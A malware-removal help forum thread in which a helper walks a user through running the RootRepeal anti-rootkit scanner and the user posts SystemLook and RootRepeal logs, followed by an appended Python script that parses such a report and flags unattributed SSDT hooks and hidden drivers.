http://rootrepeal.psikotick.com/RootRepeal.zip
Save the file to the Desktop.
Create a new folder named RootRepeal at the root of the system drive (usually C:\)

Extract the downloaded archive (right-click, then "Extract All") into this new RootRepeal folder

Step 2: No real-time protection running
Disable the antivirus resident module.

Step 3: RootRepeal (by AD), run

Close absolutely all applications, connections and browsers.

In Explorer, open the RootRepeal folder
Double-click RootRepeal.exe to start the tool.

Click the Report tab (at the bottom of the window).

Click the Scan button

In the new Select Scan window, tick:
+ Drivers
+ Files
+ Processes
+ SSDT
+ Stealth Objects
+ Hidden Services
+ Shadow SSDT

Click the OK button
In the new Select Drives window, tick the system drive (usually C:\)

Click the OK button to start the scan

Note: this scan takes some time. DO NOT START any other program while it is running.

When the scan is complete, the Save Report button becomes available.

Click this Save Report button and save the report file in the RootRepeal folder under the name RootRepeal-110513.txt

Open the File menu (top left) and click Exit to close the program.

Step 4: Real-time protection
Important: re-enable the antivirus resident module.

Step 5: Result
Post in reply:
*- the RootRepeal report (contents of the file RootRepeal-110513.txt)
This report can be very long. Make sure it is complete in the message you send. If necessary, split it across several messages.

Important note: when sending your reply (or replies), do not start a new topic; click the "Reply" button to continue in this thread.

To be continued,
nickW

Re: Request for log analysis

Post by bea23 » 15 May 2011, 14:34

Hello,
Here is the SystemLook report:

SystemLook 04.09.10 by jpshortstuff
Log created at 14:37 on 15/05/2011 by Karim
Administrator - Elevation successful

========== filefind ==========

Searching for "*cleansweep*"
No files found.

========== folderfind ==========

Searching for "*cleansweep*"
No folders found.

========== regfind ==========

Searching for "cleansweep"
No data found.

-= EOF =-

Re: Request for log analysis

Post by bea23 » 15 May 2011, 14:34

And here is the RootRepeal one:
ROOTREPEAL (c) AD, 2007-2009
==================================================
Scan Start Time: 2011/05/15 14:59
Program Version: Version 1.3.5.0
Windows Version: Windows XP SP3
==================================================

Drivers
-------------------
Name: dump_atapi.sys
Image Path: C:\WINDOWS\System32\Drivers\dump_atapi.sys
Address: 0xF2EA4000 Size: 98304 File Visible: No Signed: -
Status: -

Name: dump_WMILIB.SYS
Image Path: C:\WINDOWS\System32\Drivers\dump_WMILIB.SYS
Address: 0xF7AC6000 Size: 8192 File Visible: No Signed: -
Status: -

Name: rootrepeal.sys
Image Path: C:\WINDOWS\system32\drivers\rootrepeal.sys
Address: 0xEF173000 Size: 49152 File Visible: No Signed: -
Status: -

Hidden/Locked Files
-------------------
Path: c:\windows\temp\perflib_perfdata_268.dat
Status: Allocation size mismatch (API: 16384, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\02\0000000e_events.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\02\0000000e_objdt.dat
Status: Allocation size mismatch (API: 8, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\02\0000000e_objid.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\03\00000010_events.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\03\00000010_objdt.dat
Status: Allocation size mismatch (API: 8, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\03\00000010_objid.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\04\0000000e_events.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\04\0000000e_objdt.dat
Status: Allocation size mismatch (API: 8, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\04\0000000e_objid.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\09\0000000e_events.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\09\0000000e_objdt.dat
Status: Allocation size mismatch (API: 8, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\09\0000000e_objid.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\0a\0000000e_events.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\0a\0000000e_objdt.dat
Status: Allocation size mismatch (API: 8, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\0a\0000000e_objid.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\0d\0000000e_events.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\0d\0000000e_objdt.dat
Status: Allocation size mismatch (API: 8, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\0d\0000000e_objid.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\0e\0000000e_events.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\0e\0000000e_objdt.dat
Status: Allocation size mismatch (API: 8, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\0e\0000000e_objid.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\12\0000000e_events.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\12\0000000e_objdt.dat
Status: Allocation size mismatch (API: 8, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\12\0000000e_objid.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\13\0000000e_events.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\13\0000000e_objdt.dat
Status: Allocation size mismatch (API: 8, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\1e\0000000e_events.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\1e\0000000e_objdt.dat
Status: Allocation size mismatch (API: 8, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\1e\0000000e_objid.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: C:\Documents and Settings\Karim\Local Settings\Apps\2.0\501NMCKT.ZEN\XQT4XRTV.CZL\manifests\clickonce_bootstrap.exe.cdf-ms
Status: Locked to the Windows API!

Path: C:\Documents and Settings\Karim\Local Settings\Apps\2.0\501NMCKT.ZEN\XQT4XRTV.CZL\manifests\clickonce_bootstrap.exe.manifest
Status: Locked to the Windows API!

Path: C:\Documents and Settings\Karim\Local Settings\Apps\2.0\501NMCKT.ZEN\XQT4XRTV.CZL\manifests\clickonce_bootstrap.exe.cdf-ms
Status: Locked to the Windows API!

Path: C:\Documents and Settings\Karim\Local Settings\Apps\2.0\501NMCKT.ZEN\XQT4XRTV.CZL\manifests\clickonce_bootstrap.exe.manifest
Status: Locked to the Windows API!

SSDT
-------------------
#: 011 Function Name: NtAdjustPrivilegesToken
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c6598

#: 025 Function Name: NtClose
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c6e18

#: 031 Function Name: NtConnectPort
Status: Hooked by "<unknown>" at address 0x86cf6a30

#: 035 Function Name: NtCreateEvent
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c7ea0

#: 037 Function Name: NtCreateFile
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c70fa

#: 041 Function Name: NtCreateKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c5442

#: 043 Function Name: NtCreateMutant
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c7d78

#: 044 Function Name: NtCreateNamedPipeFile
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c619e

#: 046 Function Name: NtCreatePort
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c7c34

#: 050 Function Name: NtCreateSection
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c635a

#: 051 Function Name: NtCreateSemaphore
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c7fd2

#: 052 Function Name: NtCreateSymbolicLinkObject
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c9c14

#: 053 Function Name: NtCreateThread
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c6ab6

#: 056 Function Name: NtCreateWaitablePort
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c7cd6

#: 057 Function Name: NtDebugActiveProcess
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c9606

#: 063 Function Name: NtDeleteKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c5a06

#: 065 Function Name: NtDeleteValueKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c5d94

#: 066 Function Name: NtDeviceIoControlFile
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c7582

#: 068 Function Name: NtDuplicateObject
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37ca5d6

#: 071 Function Name: NtEnumerateKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c5ed6

#: 073 Function Name: NtEnumerateValueKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c5f80

#: 084 Function Name: NtFsControlFile
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c738e

#: 097 Function Name: NtLoadDriver
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c9698

#: 098 Function Name: NtLoadKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c541e

#: 099 Function Name: NtLoadKey2
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c5430

#: 108 Function Name: NtMapViewOfSection
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c9cc8

#: 111 Function Name: NtNotifyChangeKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c60cc

#: 114 Function Name: NtOpenEvent
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c7f42

#: 116 Function Name: NtOpenFile
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c6e9a

#: 119 Function Name: NtOpenKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c55e8

#: 120 Function Name: NtOpenMutant
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c7e10

#: 122 Function Name: NtOpenProcess
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c679e

#: 125 Function Name: NtOpenSection
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c9c3e

#: 126 Function Name: NtOpenSemaphore
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c8074

#: 128 Function Name: NtOpenThread
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c66c2

#: 160 Function Name: NtQueryKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c602a

#: 161 Function Name: NtQueryMultipleValueKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c5c52

#: 167 Function Name: NtQuerySection
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c9fe0

#: 177 Function Name: NtQueryValueKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c58a2

#: 180 Function Name: NtQueueApcThread
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c992e

#: 192 Function Name: NtRenameKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c5b1a

#: 193 Function Name: NtReplaceKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c52bc

#: 194 Function Name: NtReplyPort
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c83fe

#: 195 Function Name: NtReplyWaitReceivePort
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c82c4

#: 200 Function Name: NtRequestWaitReplyPort
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c93a6

#: 204 Function Name: NtRestoreKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37cce38

#: 206 Function Name: NtResumeThread
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37ca4b8

#: 207 Function Name: NtSaveKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c5254

#: 210 Function Name: NtSecureConnectPort
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c7668

#: 213 Function Name: NtSetContextThread
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c6cd4

#: 230 Function Name: NtSetInformationToken
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c8c56

#: 237 Function Name: NtSetSecurityObject
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c9792

#: 240 Function Name: NtSetSystemInformation
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37ca120

#: 247 Function Name: NtSetValueKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c572a

#: 253 Function Name: NtSuspendProcess
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37ca204

#: 254 Function Name: NtSuspendThread
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37ca32c

#: 255 Function Name: NtSystemDebugControl
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c9532

#: 257 Function Name: NtTerminateProcess
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c6916

#: 258 Function Name: NtTerminateThread
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c686c

#: 267 Function Name: NtUnmapViewOfSection
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c9e96

#: 277 Function Name: NtWriteVirtualMemory
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c69f6

Shadow SSDT
-------------------
#: 013 Function Name: NtGdiBitBlt
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d7cb2

#: 227 Function Name: NtGdiMaskBlt
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d7d7c

#: 237 Function Name: NtGdiPlgBlt
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d7de6

#: 292 Function Name: NtGdiStretchBlt
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d7d16

#: 307 Function Name: NtUserAttachThreadInput
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d78c6

#: 323 Function Name: NtUserCallOneParam
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d7c7e

#: 378 Function Name: NtUserFindWindowEx
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d7ab4

#: 383 Function Name: NtUserGetAsyncKeyState
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d782e

#: 414 Function Name: NtUserGetKeyboardState
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d7bb6

#: 416 Function Name: NtUserGetKeyState
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d787a

#: 460 Function Name: NtUserMessageCall
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d7a06

#: 475 Function Name: NtUserPostMessage
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d795c

#: 476 Function Name: NtUserPostThreadMessage
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d79b0

#: 491 Function Name: NtUserRegisterRawInputDevices
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d7b46

#: 502 Function Name: NtUserSendInput
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d7a66

#: 549 Function Name: NtUserSetWindowsHookEx
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d777e

#: 552 Function Name: NtUserSetWinEventHook
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d77d4

==EOF==
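An added triage script for the RootRepeal report above; it is not part of the forum thread and not RootRepeal's own code. What stands out in the posted report is that every SSDT and Shadow SSDT hook except one is attributed to klif.sys, Kaspersky's filter driver, which is consistent with the Kaspersky PURE installation on this PC. The exception is SSDT #031 NtConnectPort, hooked by "<unknown>" at 0x86cf6a30: "<unknown>" means RootRepeal could not map that address to any loaded module, so it is the one entry to single out for follow-up rather than scan past in dozens of near-identical lines. The drivers listed with "File Visible: No" are expected: the dump_*.sys images are in-memory copies of the storage stack kept for crash-dump writing and have no file of their own, and rootrepeal.sys is the scanner's own driver. The script splits the report into its sections, counts hooks per module against an allow-list (KNOWN_HOOKERS, an assumption for this machine), and flags unattributed hooks and invisible drivers outside an expected set. SAMPLE_REPORT is constructed in the shape of the posted report, with a fictitious sample_hidden.sys added so the driver check has something to flag.

```python
import re
from collections import defaultdict

# Assumption: modules expected to hook the SSDT on this PC. klif.sys is the
# Kaspersky filter driver (Kaspersky PURE is installed on this machine).
KNOWN_HOOKERS = {"klif.sys": "Kaspersky filter driver"}
# Kernel images that legitimately have no backing file: the crash-dump copies
# of the storage stack (dump_*.sys) and RootRepeal's own driver.
EXPECTED_INVISIBLE = re.compile(r"^(dump_.+\.sys|rootrepeal\.sys)$", re.I)

UNDERLINE = re.compile(r"^-{5,}\s*$")
HOOK_HEADER = re.compile(r"^#:\s*(\d+)\s+Function Name:\s*(\S+)")
DRIVER_INFO = re.compile(r"^Address:\s*(\S+)\s+Size:\s*(\d+)\s+File Visible:\s*(\S+)\s+Signed:\s*(\S+)")
HOOKED_BY = re.compile(r'Hooked by "([^"]*)" at address (0x[0-9a-fA-F]+)')

# Constructed sample in the shape of the posted report; sample_hidden.sys is
# fictitious, added so the hidden-driver check has something to flag.
SAMPLE_REPORT = r"""ROOTREPEAL (c) AD, 2007-2009
==================================================

Drivers
-------------------
Name: dump_atapi.sys
Image Path: C:\WINDOWS\System32\Drivers\dump_atapi.sys
Address: 0xF2EA4000 Size: 98304 File Visible: No Signed: -
Status: -

Name: sample_hidden.sys
Image Path: C:\WINDOWS\system32\drivers\sample_hidden.sys
Address: 0xEF100000 Size: 8192 File Visible: No Signed: -
Status: -

SSDT
-------------------
#: 025 Function Name: NtClose
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c6e18

#: 031 Function Name: NtConnectPort
Status: Hooked by "<unknown>" at address 0x86cf6a30

Shadow SSDT
-------------------
#: 013 Function Name: NtGdiBitBlt
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d7cb2

==EOF==
"""


def parse_report(report):
    """Return {section title: [entry dict, ...]}; entries are blank-line delimited."""
    sections, section, entry = defaultdict(list), None, {}
    lines = report.splitlines()
    for i, line in enumerate(lines):
        nxt = lines[i + 1] if i + 1 < len(lines) else ""
        if line.strip() and UNDERLINE.match(nxt):       # "Drivers" / "SSDT" title line
            if entry:
                sections[section].append(entry)
            section, entry = line.strip(), {}
        elif section is None or UNDERLINE.match(line) or line.startswith("=="):
            continue                                     # banner, underline, ==EOF==
        elif not line.strip():                           # blank line closes an entry
            if entry:
                sections[section].append(entry)
            entry = {}
        elif m := HOOK_HEADER.match(line):               # "#: 031 Function Name: NtConnectPort"
            entry["index"], entry["function"] = int(m.group(1)), m.group(2)
        elif m := DRIVER_INFO.match(line):               # multi-field driver line
            entry.update(address=m.group(1), size=int(m.group(2)),
                         file_visible=m.group(3).lower() == "yes", signed=m.group(4))
        else:                                            # plain "Key: value"
            key, _, value = line.partition(":")
            entry[key.strip().lower().replace(" ", "_")] = value.strip()
    if entry:
        sections[section].append(entry)
    return dict(sections)


def triage(report, known_hookers=KNOWN_HOOKERS):
    """Count hooks per module and flag hooks / hidden drivers that need follow-up."""
    sections = parse_report(report)
    by_module, unattributed, hidden = {}, [], []
    for table in ("SSDT", "Shadow SSDT"):
        for e in sections.get(table, []):
            if m := HOOKED_BY.search(e.get("status", "")):
                path, addr = m.groups()
                module = path.rsplit("\\", 1)[-1].lower()   # "<unknown>" stays as-is
                by_module[module] = by_module.get(module, 0) + 1
                if module not in known_hookers:
                    unattributed.append((table, e["index"], e["function"], path, addr))
    for e in sections.get("Drivers", []):
        if e.get("file_visible") is False and not EXPECTED_INVISIBLE.match(e.get("name", "")):
            hidden.append(e["name"])
    return {"hooks_by_module": by_module, "unattributed_hooks": unattributed,
            "unexpected_hidden_drivers": hidden}


if __name__ == "__main__":
    r = triage(SAMPLE_REPORT)
    for mod, n in sorted(r["hooks_by_module"].items()):
        print(f"{n:3d} hook(s) by {mod}: {KNOWN_HOOKERS.get(mod, 'not on allow-list')}")
    for table, idx, func, path, addr in r["unattributed_hooks"]:
        print(f"FOLLOW UP: {table} #{idx:03d} {func} hooked by {path} at {addr}")
    for name in r["unexpected_hidden_drivers"]:
        print(f"FOLLOW UP: driver {name} is loaded but has no visible file on disk")
```

To use it on the real log, read RootRepeal-110513.txt and pass its contents to triage(); on the posted report the only unattributed entry is NtConnectPort. The allow-list has to be extended for any other security product whose driver legitimately hooks the SSDT, otherwise its hooks are reported alongside the genuinely unexplained ones.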
